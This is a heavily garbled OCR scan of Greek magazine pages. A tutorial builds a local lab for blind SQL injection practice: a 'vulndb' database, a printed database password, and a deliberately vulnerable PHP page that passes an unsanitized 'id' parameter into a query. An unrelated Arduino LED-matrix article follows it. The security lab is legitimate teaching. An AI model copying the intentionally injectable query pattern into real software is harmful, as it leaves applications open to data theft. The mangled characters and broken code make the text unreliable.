http://bit.ly/dhei2BlindsQLi (προσοχἠ ота πεζοκεφαλαἰα). 


m Terminal ἘΠ 
File Edit View Search Terminal Help 
) show database 


To υπόστρωμα 


al Ξεκινάμε κάνοντας va πλήρες 
update στα repositories rou Mint 
κι εγκαθιστὠντας στη συνέχεια TO 
πακέτο LAMP: 


information sc 
mysql 

performance schema 
test 

vulndb 


alf@nostromo ~ $ sudo apt-get 
update 


alf@nostromo ~ $ sudo apt-get 
install lamp-server 


Κατά τη διάρκεια της εγκατάστασης 
θα ζητηθεί va password για τον 
χρήστη root -- της MySQL. Δίνουμε 
va ισχυρὀ συνθημµατικὀ και ppo- 
ντίζουµε ма το θυμόμαστε, упаті θα 
σπορ μας χρειαστεἰ πολὺ σύντομα. Με то 
задає τέλος της εγκατάστασης μπορούμε 
va δοκιµάσουµε том Apache web 
server δίνοντας στον Firefox του 
Mint τη διεύθυνση http://127.0.0.1. 
- Εφόσον πήγαν бла кала, θα µας 

καλωσορίσει το γνωστὀ μήνυμα «It 
works!". Αμέσως μετὰ, σειρἀ ἐχει η σύνδεση στη MySQL, ως root (της 
MySQL). Σκοπὸς µας ropa εἶναι η δηµιουργία της βάσης την οποία και θα 
χρησιμοποιεἰ το τρωτὀ µας web application. Па τη σύνδεση στη MySQL 
σαν root, δίνουμε το ακὀλουθο: 


mysql> и 
Database 


Tables іп: 


mysql» 


I" 


alf@nostromo ~ $ mysql -u root -p 


2. Linux - Apache - MySQL - PHP 
3. http://themole.nasel.com.ar/ 


Επίθεση στα τυφλά! (μέρος 10) 
Αα 


Μόλις δώσουμε το password rou root yia τη MySQL, το σύστημα θα µας 
καλωσορίσει και θα βρεθούμε στη γραμμὴ εντολών της MySQL. Па τη 
δημιουργία της βάσης και των πινάκων nou θα χρειαστεἰ το web app, 
арке! va φορτώσουμε ёха αρχείο µε μερικά SQL statements. Σε ауто 
το στάδιο, αν δεν το ἐχετε κἀνει бп, πρέπει να κατεβάσετε то πακέτο 
που αναφέραμε νωρίτερα (auró апо то http://bit.ly/dhO12BlindSQLi). To 
αρχείο nou µας ενδιαφἑρει εἶναι το create db.sql και για τη фӧртос rou 
αρκεἰ να δώσουμε кайт! τέτοιο: 


mysql» source Desktop/create db.sql 


Προφανώς, στη θέση rou Desktop θα πρέπει να βάλετε rov κατάλογο 
στον οποίο ἐχετε αποσυμπιέσει το πακέτο ZIP. Επεξηγηματικἁ, να πούμε 
ότι та statements που περιλαμβάνει το create. db.sgl θα δηµιουργήσουνε 
µια βάση µε то ὀνομα vulndb και τους πίνακες users kai pages. Ο nivakag 
users έχει δύο στήλες (username kai password), ενώ ο πίνακας pages 
ἐχει τρεις στήλες (id, page content και author). Επιπρὀσθετα, εισἀγο- 
ута! µερικοἰ χρήστες και τα αντίστοιχα password, σε κρυπτογραφηµένη 
µορφή, καθώς επίσης και περιεχόμενο στον πἰνακα pages. Τέλος, δηµι- 
ουργεῖται ο χρήστης dbo µε password το from, outer space. О εν λόγω 
χρήστης ἐχει πλήρη δικαιώματα στη βάση vuldb. Αυτὸς ο λογαριασμὀὸς 
θα χρησιμοποιείται αργότερα απὀ то script µας, yia τη διαχείριση της 
βάσης. Αναρωτιέστε γιατὶ δεν χρησιμοποιούμε το χρήστη root γι΄ αυτή τη 
δουλειά; Εἰπαμε να κἄνουμε ἑνα τρωτὀ server, алла αυτό δεν σημαίνει 
бт! θα та ισοπεδώσουµε òa! О root της MySQL ἐχει πρὀσβαση σε ЖОЛЕСЖ 
τις βάσεις κι αν µε κἄποιο тропо αποκαλυφθούν τα бка του credentials, 
μπορούμε να ξεχάσουμε *óAec* τις βάσεις του συστήματός μας. Επομέ- 
voc, η δημιουργία ενὸς ξεχωριστού χρήστη για τη διαχείριση κάθε βάσης 
αποτελεί ζήτημα υψίστης ασφάλειας. Тора орос ξεφύγαμε апо το θέμα 
μας... Εφόσον λοιπὸν φορτώθηκαν κι εκτελέστηκαν ra SQL statements, 
μπορούμε να κάνουμε μερικὲς δοκιμές. Ουσιαστικά, μπορούμε να ζητή- 
coupe апо τη MySQL να προβάλει τη βάση και τους пімакёс της, yia ма 
βεβαιωθούμε бт! ἐγιναν ὁλα σωστά. Πα παράδειγµα, για να δούμε ὀλεςτις 
βάσεις δεδομένων και να ελέγξουμε αν δημιουργήθηκε η vulndb, аркі να 
δώσουμε кат! τέτοιο: 


Οι ἐλεγχοι στη 
βάση vulndb 
μπορούν να 
συνεχιστούν 
μέχρις εσχάτων. 

Н συγκεκριμένη 
βάση περιλαμβάνει 
όλο το περιεχόµενο 
που θα оєрВі- 

ρει αργότερα η 
ευάλωτη δικτυακή 
εφαρμογή... 


X Terminal 
mysql> show databases; MU MEL a M 


Στη συνέχεια, yia να δούμε τους | 
πίνακες της vulndb аркєї va δὀ- и νεο REI εκ. τς 
OOUE το εξἠς: 

mysql» use vulndb; 


Database changed 


mysql» show tables; 


Αφού επιβεβαιώσουμε Ori εἶναι όλα 
καλά, μπορούμε ма επιστρέψουμε 
στη γραμμὴ εντολών του BASH, õi- 
νοντας ἑνα exit. 


Н τρωτή єфарроуй 


Επόμενο σταθμὀ αποτελεἰ η δηµιουργία της «τρύπιας» δικτυακής εφαρ- 
μογἠς. Πρόκειται για ἑνα υποτιθέμενο δικτυακὀ αρχεἰο (archive), µε та 
άρθρα του περιοδικού. Ουσιαστικά, ὀλη η εφαρµογἠ βρἰσκεται στο αρχείο 
webapp.php, μέσα στο πακέτο BlindSQL.zip. Па την εγκατάσταση (!) της 


Ο κώδικας yia 

τη δικτυακή µας 
εφαρµογή. Το 
μαρκαρισμένο 
τμήμα δείχνει την 
περιοχή στην οποία 
συντελείται TO 
έγκλημα: To input 
sanitization εἶναι 
της πλάκας! 


NND 


NNN 


τ Terminal - + κ 
Fille Edit View Search Terminal Help 
GNU nano 2.2.6 


File: /var/www/webapp.php 


«ІООСТУРЕ html PUBLIC "- 
"http: 
«html xmlns-"http: 
<head> 
<title>Blind SQL Injection example</title> 


2</a> 
e 3</a> 
e 4</a> 


="?id=5">Article 5</а> 


connect("localhost","dbo","from outer space"); 
if (1549) 4 
echo "Could not connect to database: '" . 1 r Er «hc a 


1 c Indb", $db)) { 

if (5 GET[ 17 null) { 
$id - $ GET['id']; 

) else ( 


$sql - "SE 
ult 


. “<br /><һг /»n"; 
. "<br />\n"; 
"by ".$row['au je "<br />\n"; 
o "Page not found.«br />\n"; 
} 
} else ( 
echo "Could not open to database: "" . 


e(Sdb); 


Π сет Help IS writeout [ Read File Prev Page IE сиг Text WS cur Pos 
a Exit Ж Justify where Is My Next Page MI Uncut Text Ф To Spell 


εφαρμογἠς арке! п αντιγραφἡ rou єм λόγω script μέσα oro Document 
Root rou Apache. (Στη δικἠ µας περίπτωση rjrav o κατάλογος /var/www.) 
Με µια ματιὰ στο περιεχόµενο rou webapp.php, πιστεύουμε бт! θα εντο- 
πἰσετε αμέσως το πρόβλημα... 


if (mysql select db("vulndb", $db)) { 
if ($ GET['id'] != null) { 
$id = $ GET['id']; 
) else { 
$id - 1; 
} 
То µόνο input sanitization που γίνεται στην παράμετρο id εἶναι ¿vac ἐλεγ- 
Хос̧ yia va διαπιστωθεὶ ότι δεν εἶναι κενἠ (null). Εδὠ κι αν μιλάμε για 
ανεπαρκἡ ἐλεγχο! Θα μπορούσε τουλάχιστον να ακολουθεἰ µια δήλωση 
της μεταβλητής id, µε την ακόλουθη µορφή: 


$id - intval($ GET['id']) 


Με αυτόν τον rpóno, οτιδήποτε ἐδινε ο χρήστης θα µετατρεπόταν auró- 
рата σε integer. Έτσι, ба αποκλειόταν µια μεγάλη μερίδα επικίνδυνων 
queries. 


Επίθεση στα τυφλά! (μέρος 10) 
ri 


Στη συνέχεια δίνουμε ёха sudo restart apache2, £roi, yia ra καλορἰζικα. 
Тора, av xouv γίνει όλα σωστά, θα μπορούμε να επισκεφθούμε το νέο 
нас web application, απὀ τον αγαπημένο µας browser. Μπορούμε να ка- 
νουµε τις δοκιμὲς και να παΐξουμε µε την εφαρµογή, επισκεπτόὀµενοι τη 
διεύθυνση http://localhost/webapp.php. Παρεμπιπτόντως, TO συγκεκρι- 
μένο web app θα μπορούσε va χρησιμοποιηθεὶ και σε μελλοντικά ἄρθρα, 
σχετικἁ µε web attacks. Τι θα λέγατε για µια yvopipia µε ra union select 
injections, cross site scripting, local file inclusion και directory traversal; 
Ας µην προτρέχουµε брас... 


m Blind SQL Injection example - Mozilla Firefox EN 
File Edit View History Bookmarks Tools Help 
| C3 Blind SQL Injection example | * | 


** | @ localhost/webapp.php v 9 | [El v Googl: ο 4 


Welcome to the deltaHacker's article archive! 


Article 1  Article2  Article3  Artidle4 Article 5 


Article: 1 


Windows passwords 
by subZraw 


Ολοκλήρωση 


Ὅπως εἶπαμε παραπάνω, yia την επίθεση θα χρησιμοποιήσουμε μερικά 
біка µας scripts γραμμένα σε Perl, καθὼς και το themole. Επομένως Ва 
χρειαστούμε τον interpreter тпс Perl, καθώς επίσης και ορισμένα modules 
για την Python 3. Στο біко µας περιβάλλον п Perl ἦταν ἠδη εγκατεστημέ- 
νη, κι εδὠ που ra λέμε θα τη βρείτε προεγκατεστηµένη στις περισσὀτε- 
рес διανομὲς Linux. Ιδιαίτερη προσοχὴ θα χρειαστεἰ για το themole. Αρχι- 
ка πρέπει να επισκεφθούμε την επἰσηµη ιστοσελἰδα στο http://themole. 
nasel.com.ar και va κατεβάσουµε то πακέτο deb. Στη συνέχεια θα то 
εγκαταστήσουµε δίνοντας κάτι τέτοιο: 


alf@nostromo -/Desktop $ sudo арке -i themole 0.3-1 all.deb 


Σημειώστε ὁτι οφείλουμε va ακολουθήσουμε ὀλεςτις υποδείξεις nou ev- 
δέχεται να εμφανιστούν για та missing dependencies. Αν χρησιµοποιείτε 
κάποια διανομὴ που δεν βασίζεται сто Debian, ακολουθήστε τις οδη- 
γίες που παρέχονται στο site του themole (http://themole.nasel.com. 
ar/?q-documentation/installation). 


Тора, av κουραστήκατε µε την (апараїтптп) προετοιμασία, µην ανησυ- 
χεἰτε! Θα σας ανταμείψουμε στο επόμενο арбро, στο onoio κάτι µας λέει 
бт! δεν θα Варєбеїтє καθόλου και, ευτυχώς για όλους µας, ξεκινά апо 
τη σελἰδα 76 rou deltaHacker nou κρατάτε στα χέρια σας. Σ’ αυτό, ξε- 
κινάμε µε μερικὲς διερευνητικὲς επιθέσεις, µε σκοπὀ м" ανακαλύψουμε 
το injection point, ενώ αμέσως μετὰ αρχίζουμε µε κανονικότατες επιθέἑ- 
σεις blind SQL injection. Έτσι, θα δείτε την κατασκευἠ κατάλληλων SQL 
queries τα οποία καταφέρνουν να εξάγουν διάφορες κρυφές πληροφο- 
piec -- ὑπουλα κι αποτελεσματικά! Στο τέλος του άρθρου εξετάζουμε και 
уєріка χρήσιμα εργαλεία, µε тп βοήθεια των οποίων οι σχετικὲς επιθέσεις 
απλοποιούνται σε μεγάλο βαθμό. Αλλά кат! µας λέει оті αυτή την τελευ- 
taia πρόταση δεν τη διαβάσατε, γιατὶ ἠδη ἐχετε γυρίσει στη σελίδα 76. 
Ἠ μήπως ὀχι; Παράξενο πράγμα πάντως, є; Αν το φιλοσοφήσετε λίγο, 
θα δείτε ότι αυτὲς οι τελευταίες προτάσεις εἶναι οιωνεἰ ανύπαρκτες. Χμ. 


Μη рас πείτε ὁτι 
δεν εἶναι πανἐµορ- 
qo ro νέο µας web 

application :) 
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О ἔλεγχος ємос RGB LED matrix αποτελεί 
ша прокЛптіка σύνθετη £pyaoia και δεν 
εἶναι тихаїо ὁτι ἑλκει παλιούς και νέους ота 
ηλεκτρονικά. Πρόκειται yia µια εργασία που 
απαιτεῖ καθαρἠ σκέψη και σχετικά υψηλό 
επίπεδο προγραμματιστικὠν γνώσεων. 
Εξάλλου, η χαμηλἠ ανάλυση том matrix 
παραπέμπει αυτόματα στα παιχνίδια των παλιών 
υπολογιστών. Σ’ αυτά που ὁλοι έχουμε δει και 
όλοι θα θέλαμε να φτιάξουμε κάποια στιγµή... 


bu Spir&lEvolution 


ж ónou К θετικὀὸς ak£paiog pe. т 
µια ενδιαφέρουσα ιδιότη 
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WV'HAGIKER 


ÁN 


Σε προηγούμενο άρθρο της σειρὰς µας, και συγκεκριµένα στο deltaHacker 
007, εξετάσαµε το πὼς υλοποιείται το Pulse Width Modulation σε software. 
Υπάρχουν βλέπετε περιπτώσεις στις опоієс τα κανάλια PWM που προσφέἑ- 
ρει ο επεξεργαστἠς του Arduino δεν επαρκούν και τότε η строфі στο 
software αποτελεἰ μονόδρομο. Ωστόσο, отау υλοποιούμε ¿va σύστημα 
PWM μεγάλης ακρίβειας (πολλὠν βημάτων ρύθμισης) η απὀδοση του KW- 
δικα μειώνεται брастіка: Το πρὀγραμμα αφιερώνει περισσότερο επεξερ- 
γαστικὀ χρόνο στο μηχανισμό του РММ και λιγότερο στις εργασίες για τις 
οποίες ro γράψαμε. Κάπως ἐτσι αρχίσαμε να μιλάμε, στο τεύχος 008, για 
το Binary Code Modulation. Н συγκεκριμένη τεχνικἠ υλοποιείται εὐκολα 
και πολύ αποδοτικἁ, ενώ σε αρκετὲς περιπτώσεις μπορεί να υποκαταστή- 
сє! πλήρως ro Pulse Width Modulation. Σ΄’ αυτὲς περιλαμβάνεται κι εκείνη 
που ενθουσιάζει τους περισσότερους geeks των ηλεκτρονικὠν: Н ρύθμι- 
ση της φωτεινότητας µιας συστοιχίας LED. 


'OAa αυτά xouv ιδιαίτερο θεωρητικὀ ενδιαφέρον κι akoviGouv τις προ- 
γραμματιστικὲς µας ικανότητες. Ωστόσο, η γνωριμία µας μαζὶ τους δεν 
έγινε για ακαδημαϊκούς λόγους. Πριν εξετάσουμε τα PWM και BCM eixa- 
µε δει το κύκλωμα yia τη διασύνδεση rou Arduino у" ἑνα 8x8 RGB LED 
matrix. Όπως υποψιάζεστε, λοιπὸν, o απὠτερος στόχος µας ἦταν ν΄ ano- 
κτήσουμε τον καλύτερο δυνατὸ ἐλεγχο αυτής της διάταξης. Ένα τέτοιο 
matrix εἶναι ikavó να προβάλει εκατομμύρια χρώματα, evo στα 64 pixel 
του μπορεἰ κανεὶς να εμφανίσει μηνύματα, να σχεδιάσει апла урафіка 
(retro sprites) και να φτιάξει οτιδήποτε φανταστεί (Σ.τ.Ε. Ακόμα κι £vav 
δράκο, να пім то пото του ξαπλωμένος σε µια αιώρα µε φόντο το σελη- 
мако топіо;) Έτσι, για то napóv άρθρο συνδυάσαµε το κύκλωμα апо το 
τέταρτο μέρος της σειράς, нє тїс γνώσεις nou anokopicape апо τη μελέτη 
του Binary Code Modulation. Το αποτέλεσμα rjrav ιδιαίτερα ικανοποιητικὀ 
και μπορείτε να πάρετε ша γεύση απὸ το σχετικὀ βίντεο στο 


http://deltahacker.gr/?p-6394 


Ὅμως уп νομίζετε ὁτι п εφαρµογἠ του BCM σε éva RGB matrix επιτυγ- 
χάνεται εὐκολα. Н προσπἀθειὰ µας ἦταν γεμάτη δυσκολίες. Βέβαια, ¿vag 
άνθρωπος nou ауапа том προγραμματισμὀὸ χαίρεται отау συναντά TŻ- 
τοιου εἶδους δυσκολίες και πολύ περισσότερο ὁταν καταφέρνει και τις 
ξεπερνά ;) Στη συνέχεια θα παρουσιάσουμε τη λογικὴ µε την οποία ava- 
πτύξαμε та óikà µας προγράμματα, θα αναφέρουμε τα προβλήματα που 
συναντήσαμε και φυσικἀ τις λύσεις που δώσαμε. Ελπίζουμε η δικἠ µας 
περιπέτεια να σας ωθήσει να ξεκινήσετε τη δικἠ σας. Πολύ περισσότερο, 
θέλουμε va δούμε τις δικὲς σας υλοποιήσεις και та δικἁ σας παιχνἰδια! 


Πρώτη προσέγγιση 


Πριν αρχίσουμε να γράφουμε, αφιερώσαμε λίγο χρόνο στη μελέτη του 
ζητήματος και στη σχεδίαση του κὠδικα. Περιττό να πούμε бт! στο τέλος 
το πρὀγραμμὰ µας ἦταν πολύ διαφορετικὀ απὀ auró nou εἶχαμε ката νου 
αρχικἀ. Ωστόσο, το стабіо της προετοιμασίας υπήρξε απαραίτητο yia va 
ξεκαθαρίσουµε ra βασικἀ και να μπορέσουμε να ξεκινήσουμε. 


Στόχος µας тау να εφαρμόσουμε την τεχνικἠ Binary Code Modulation 
ота LED ενὸς matrix. Ὅπως εἰδαμε στο προηγούμενο μέρος της σειρὰς 
(τεύχος 008), η εφαρμογἠὴ rou BCM σε μερικὰ LED επιτυγχάνεται εὐκολα. 
Σε уємікєс γραμμές, αν το σύστημα nou υλοποιούμε ἐχει ακρίβεια k bitt, 
διαιρούµε το χρόνο της περιόδου του BCM σε επιµέρους διαστήματα. 


1. Αὐτὸ συνεπάγεται ότι προσφἑρονται 2^k επίπεδα ρύθμισης. 


Arduino - the way of the hacker!! (μέρας 7/k) 


ri 


Στο прото διάστηµα εξετάζουμε την TIA του πρώτου bit της ἐντασης 
κάθε LED και, σύμφωνα у" αυτήν, ανάβουµε ἡ σβήνουμε το єкастотє LED. 
Н ἴδια διαδικασία επαναλαμβάνεται και στα επόμενα υπό- διαστήματα της 
περιόδου, εξετάζοντας κάθε фора το επόμενο bit της έντασης. Αυτή n ne- 
ριγραφή, av και πολὺ συνοπτική, κρύβει µια σηµαντικἡ λεπτομέρεια: Па 
ма εφαρµοστεἰ то BCM σε πολλά LED, ο μικροελεγκτἠς πρέπει να ελέγχει 
όλα τα LED ауа паса στιγµἠ και μάλιστα το καθένα ανεξάρτητα апо та 
υπόλοιπα. Ακριβώς εδὠ προέκυψε η πρώτη avanoóià: Στην περίπτωση 
ενὸς matrix, σε οποιαδήποτε χρονική στιγμή o μικροελεγκτἠς ελέγχει 
μόνο τα LED µιας συγκεκριμένης γραμμὴς (ἡ στήλης). Επομένως, εἶναι 
αδύνατο να εφαρμόσουμε ro Binary Code Modulation σε όλα та LED του 
matrix -- τουλάχιστον ὀχι µε τον τρόπο που έχουμε δει ως тора. 


Γραμμή προς γραμμή 


H λύση βρέθηκε εὐκολα. Το γεγονὸς ӧт о μικροελεγκτἠς δεν unopei 
να ελέγξει όλα ra LED του matrix ταυτόχρονα, αποτελεἰ πρόβλημα που 
έχουµε αντιμετωπίσει (και λύσει) προ πολλού. Θυμηθείτε noc σχεδιά- 
ζουμε κάτι о" ἑνα matrix. Па να πετύχουμε κάτι τέτοιο πραγματοποιούµε 
τη λεγόμενη σάρωση. Με απλά λόγια, ενεργοποιούμµε κάθε στιγμή µια 
γραμμὴ (й στήλη), ανάβουµε ónoia LED θέλουμε επάνω της και μετὰ anó 
ἑνα σύντομο xpovikó διάστηµα προχωράμε στην επόμενη. Όταν τελειώ- 
σουν οι γραμμὲς rou matrix (ἡ οι στήλες, αντίστοιχα) επιστρέφουµε στην 
πρώτη και επαναλαμβάνουμε τη διαδικασία. Τελικά, πραγματοποιώντας 
τη σάρωση µε μεγάλη συχνότητα τα διάφορα LED του matrix μοιάζουν 
να ανάβουν ταυτόχρονα, ανεξάρτητα апо τη γραμμή και τη στήλη στην 
οποία βρίσκονται. E, Aoinóv, το koAnóki µε την ταχύτατη σάρωση μπορεὶ 
να µας βοηθήσει και στην εφαρμογἠ rou Binary Code Modulation. Δώστε 
βάση: Αρχικἁ, σκεφτόμασταν να εφαρμόσουμε ro BCM επάνω σε ὁλα та 
LED του matrix, ταυτόχρονα. Φαινόταν λογικἠ λύση, ἦταν απλὴ και µας 
βόλευε! Ωστόσο, ónog εἶπαμε προηγουμένως, κάτι τέτοιο εἶναι αδύνατο. 
Αυτὸ που μπορούμε να κάνουμε εἶναι να εφαρμόσουμε το BCM επάνω σε 
uia μόνο γραμμὴ rou matrix, για κἀποιο χρονικὀ διάστημα. Στη συνέχεια, 
θα εφαρμόσουμε την ἱδια τεχνικἠ και για то ідо χρονικὀ διάστηµα στην 
επόμενη γραμμὴ του matrix και πάει λέγοντας. Με ἆλλα λόγια, η λύση 
ἐγκειται στην πραγματοποίηση µιας аркєта σύνθετης σάρωσης. Σε кабє 
βήμα αυτἠὴς της σάρωσης δεν θα περιοριζόµαστε σε va аплӧ άναμμα 
ἡ σβήσιμο των LED, αλλά θα ρυθμίζουμε την ἑνταση του καθενός! To 
πρὀγραμμα, δηλαδή, πρέπει να σαρώνει ro matrix γραμμή προς γραμμὴ 
και σε καθεμία να εφαρμόζει την τεχνικἠ Binary Code Modulation. Όπως 
καταλαβαίνετε, η λύση βρέθηκε εὐκολα αλλά δεν ἦταν καθόλου απλή... 
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Εικόνα 1 

Ta шкра RGB LED 
matrix διαθέτουν 
64 pixel (kouki- 
δες) kai πίσω апо 
καθεμία περιλαμ- 
βάνουν τρία LED: 
Ένα κὀκκινο, ἐνα 
πράσινο ki ἑνα 
μπλε LED. Έτσι, σε 
αυτές τις μικρές 
"οθόνες” κρύβονται 
192 LED! 
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Κάθε πότε; 


Έχοντας auróv τον οδηγὀ --που πιο πολύ µε λαβύρινθο ἐμοιαζε--, ξεκίνη- 
σε п συγγραφή rou κὠδικα. Μη φανταστείτε ὁτι αρχίσαμε να γράφουμε 
µε φούρια κι От! μετὰ апо λίγες opec εἰχαμε ξεμπερδέψει. Τα πράγματα 
δεν ἦταν τόσο απλά -- ἡ τουλάχιστον ду! ὅσο νομίζαμε. 


Н σάρωση rou matrix θα έπρεπε να πραγματοποιείται µε απόλυτα σταθε- 
ро ρυθμὀ, ώστε τα διάφορα γραφικἀ να προβάλλονται επἰσης σταθερά, 
χωρίς flickering. Ακριβώς γι’ ауто αποφασίσαμε бт! η σάρωση rou matrix 
θα πραγματοποιείται μέσα στο service routine ενός timer interrupt. Αυτή 
η σκἐψη ἦταν σωστἠ και η συγγραφή rou κὠδικα ξεκίνησε µε то катал- 
ληλο σετάρισµα £vóc timer. Ὅμως, πόσο συχνά θα έπρεπε ма пиробо- 
τεἰται TO σχετικὀ interrupt; Σε кабє συσκευἠ απεικόνισης, η ελάχιστη 
συχνότητα σάρωσης (ἡ ανανέωσης) ὥστε να µην παρατηρείται καθόλου 
flickering, καθορἰζεται anó το προβαλλόμενο περιεχόµενο. Σε γενικὲς 
γραμμές, ὁσο πληθαἰνουν οι γρήγορες εναλλαγές και οι μεγάλες µετα- 
βολές στη φωτεινότητα, τόσο μεγαλύτερη πρέπει να εἶναι η συχνότητα 
σάρωσης. AUTÒ το ζήτημα ὁμως параєїмат θεωρητικὀ και το αφήσαμε για 
τους τεχνικούς TOU κινηματογράφου. Στο δικὀ µας project, αποφασίσαμε 
оті µια απόλυτα αποδεκτἠ συχνότητα σάρωσης εἰναι ra 100Hz. Με алла 
λόγια, αποφασίσαμε бт! αν то matrix σαρώνεται εκατὸ φορὲς το δευτερὀό- 
λεπτο, η εικὀνα του θα εἶναι σταθερἠ θα κουράζει ελάχιστα τα μάτια και 
δεν θα δυσκολεύει καθόλου την κάμερα, στην περίπτωση που θα θἐλαµε 
να φτιάξουμε éva μικρὸ βίντεο |) 


Αφού Еєкаварісацє κι ауто το ζήτημα, αρχίσαμε επιτέλους να γράφουμε 
κὠδικα. Το πρόγραµµα ξεκινούσε µε την κατάλληλη ρύθμιση του Тітегі, 
осте να προκύπτει ¿va interrupt κάθε 10msec?. Н επιλογή του timer ἑγι- 
νε σχεδὀν αυθαίρετα. Το ζήτημα ἦταν να µην πειράξουµε καθόλου том 
TimerO. Πάνω о" αυτόν, βλέπετε, στηρἰζεται η λειτουργἰα των διαδικασι- 
Qv delay και delayMicroseconds, οι οποἰες ἦταν πολύ πιθανό να µας χρει- 
астойм αργότερα. Ἐχοντας επιλέξει και ρυθμίσει ¿vav timer, μπορούσαμε 
να προχωρήσουμε στο σημαντικότερο τµήµα του προγράµµατος: Σε αυτό 
που θα πραγματοποιούσε τη σάρωση και ταυτόχρονα θα εφάρμοζε την 
τεχνικἠ Binary Code Modulation σε κάθε γραμμὴ rou matrix. 


(Όχι kai τόσο) Лєпторнєрпс σχεδιασμὀς 


Σε ауто то σημείο, περισσότερο апо ποτὲ νιώσαμε την ανάγκη ма βάλου- 
με τις σκέψεις µας σε µια орӣ. П’ αυτὸ γράψαμε λίγο κὠδικα σε HAPC?, 
τον οποίο ба χρησιμοποιούσαμε σαν μπούσουλα ката τη συγγραφή του 
αληθινού κὠδικα. Ξεκινήσαμε µε то γενικὀ πλάνο για τη ρουτίνα σάρωσης 
TOU matrix: 
Interrupt Service Routine 

Binary Code Modulation on 15% line 

Binary Code Modulation on 2nd line 

[...] 

Binary Code Modulation on 7th line 


Binary Code Modulation on 8th line 


2. Ὅταν πραγματοποιείται κάτι ανά 10msec, η συχνότητα αυτού του κάτι εἶναι 100Hz. 
3. Highly Abstract Pseudo-Code. Πρόκειται yia γλὠσσα δικής µας επινόησης και проферєтаї ХАЧ... µε κεφα- 
λαία :Р 


Rrduino - the шау of the hacker!! (µέρος 7/k) 


P 


Στη συνέχεια, yia να έχουμε каваро ro noc θα εφαρμόζεται ro Binary 
Code Modulation σε κάθε γραμμή, γράψαμε λίγο ψευδοκώδικα ακόμα. 
бєланє να υλοποιήσουμε ro BCM µε ακρίβεια 8bit και γι΄ αυτό στο πλάνο 
μας συμπεριλάβαμε окто βήματα: Ένα για κάθε υποδιαστήμα της NE- 
ριόδου του BCM. Ката τα γνωστὰ, καθένα апо αυτά τα διαστήματα θα 
έπρεπε να ἐχει διπλάσια διάρκεια апо το αμέσως пропуойиємо. Έτσι, TO 
πλάνο µας διαμορφώθηκε ως εξἠς: 


Binary Code Modulation on a line 
// according to 1st bit of intensity of each LED.. 
Turn each LED on or off and wait for X time 
// according to 2nd bit of intensity of each LED.. 


Turn each LED on or off and wait for 2 * X time 


D] 

// according to 7th bit of intensity of each LED.. 
Turn each LED on or off and wait for 64 * X time 
// according to 8th bit of intensity of each LED.. 
Turn each LED on or off and wait for 128 * X time 


Γράφοντας τα παραπάνω, συνειδητοποιήσαμε ὁτι то πρὀγραμμά нас χρει- 
αζόταν τουλάχιστον δύο frame buffers. Τα περιεχόμενα του ενὸς θα біа- 
Вас̧оута anó τη ρουτίνα σάρωσης και θα προβάλλονται στο matrix. Στο 
δεύτερο frame buffer θα σχεδιάζεται το επόμενο frame. Πα το σκοπὀ 
ауто opicape δύο πίνακες, των 192 bytes ἑκαστος. Амаратієсте пос ENI- 
λέξαμε το уєуєвос τους; Εφόσον ασχολούμαστε µε ἑνα RGB LED matrix, 
κάθε pixel διαθέτει тріа επιµέρους LED (£va κὀκκινο, ἑνα πράσινο κι ἑνα 
μπλε). Епіспс̧, то BCM που θέλαμε να υλοποιήσουμε eixe ακρἰβεια 8bit. 
Επομένως, yia την περιγραφή της ἐντασης όλων των LED, όλων των 
pixel, χρειαζόμασταν 3364 = 192 bytes. 


Μια ανησυχητικἠ διαπίστωση 


Εἰχαμε πάρει φόρα! Διευθετούσαμε то va ζήτημα μετὰ το ἆλλο και νιώ- 
θαµε ὅτι κανένα πρόβλημα δεν μπορεὶ να µας σταματήσει. Μέχρι nou 
αποφασίσαμε να υπολογίσουμε αυτὸ ro рпнабі ro X. Μιλάμε για то Xpo- 
νικὀ διάστηµα X, το οποίο αναφέρεται σαν "X time" στο δεύτερο πλάνο 
του κὠδικα. Αυτό το διάστηµα δεν θα μπορούσε να επιλεγεἰ τυχαία. Σκε- 


Εικόνα 2 

Το κύκλωμα µε то 
οποίο θα παίξουμε 
αυτή τη φορά, θα 
πρέπει να σας εἰναι 
γνώριμο. Το εἰχαμε 
ξαναδεί στο 40 
μέρος της σειράς, 
στο deltaHacker 
006. Η υλοποίηση 
στο breadboard 
ξεκινά µε τους 
shift registers. Ta 
τσιπάκια τοποθετή- 
θηκαν σε απόστα- 
ση μεταξύ τους, 
ώστε та καλώδια 
προς το matrix 

va µη μπλεχτούν. 
Αφού συνδέσαµε 
την τροφοδοσία 
των τσιπ και μερικά 
ακόµα σήματα 
(Output Enable, 
master reset k.d.), 
єтОасає kai TO 
кро keypad. О! 
τέσσερις διακόπτες 
εἶναι συνδεδεμένοι 
σε ἑναν διαιρέτη 
τάσης, WOTE να 
ελέγχονται όλοι 
апд ша αναλο- 
γική εἰσοδο του 
Arduino. 
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Qreire то εξἠς: Πόσος χρόνος περνάει μέχρι να ολοκληρωθεί n εφαρμογἠ 
του BCM σε μία γραμμή; Ам συμβολίσουµμε auro το μέγεθος µε T, ισχύει 
το εξἠς: 

T 2 X + 2*X +... + 64*X + 128*X = 255*X 


Προφανώς, yia va олоклпроӨєі ша σάρωση (για va εφαρμοστεί то BCM 
στις окто γραμμές rou matrix), απαιτείται χρόνος icoc µε 8T. Αυτό µας 
κάνει 2040X. Σημειώστε το auró. Όπως αναφἑραµε νωρίτερα, o χρόνος 
μεταξὺ δύο διαδοχικὠν σαρώσεων εἶναι 10msec. Επομένως, το χρονικὀ 
διάστημα των 2040Х, πρέπει να εἶναι (το поло) ico µε 10msec. 


2040*X = 10msec <=> X = 10msec/2040 <=> X ~= 4,9рѕес 


Ὠπα! Σύμφωνα µε τους υπολογισμούς µας, το χρονικό διάστηµα X ἐπρε- 
πε να εἶναι λίγο μικρότερο anó 5 εκατομμυριοστά του δευτερολέπτου. 
Μπορούμε να γράψουμε κὠδικα nou θα κάνει оса προβλέπονται απὀ то 
πλάνο, τόσο γρήγορα; 


Σκούρα τα πράγματα 


Па να απαντήσουμε о" αυτό το ερώτημα, ἐπρεπε να εξετάσουμε ὁσα πε- 
ριγράφονταν συνοπτικἀ (και ара κρύβονταν) στο τελευταίο πλάνο. Έτσι, 
ξαναγράψαμε rov ψευδοκώδικα, αλλά µε περισσότερες λεπτομέρειες. 
Αυτή τη φορά θέλαμε να δούμε ὀλες τις επιµέρους εργασίες nou περιε- 
λάμβανε η εφαρµογἠ του BCM, σε uia γραμμή: 


Binary Code Modulation on a line 
// according to 1st bit of intensity of each LED.. 
Get intensity value for each LED of active line 
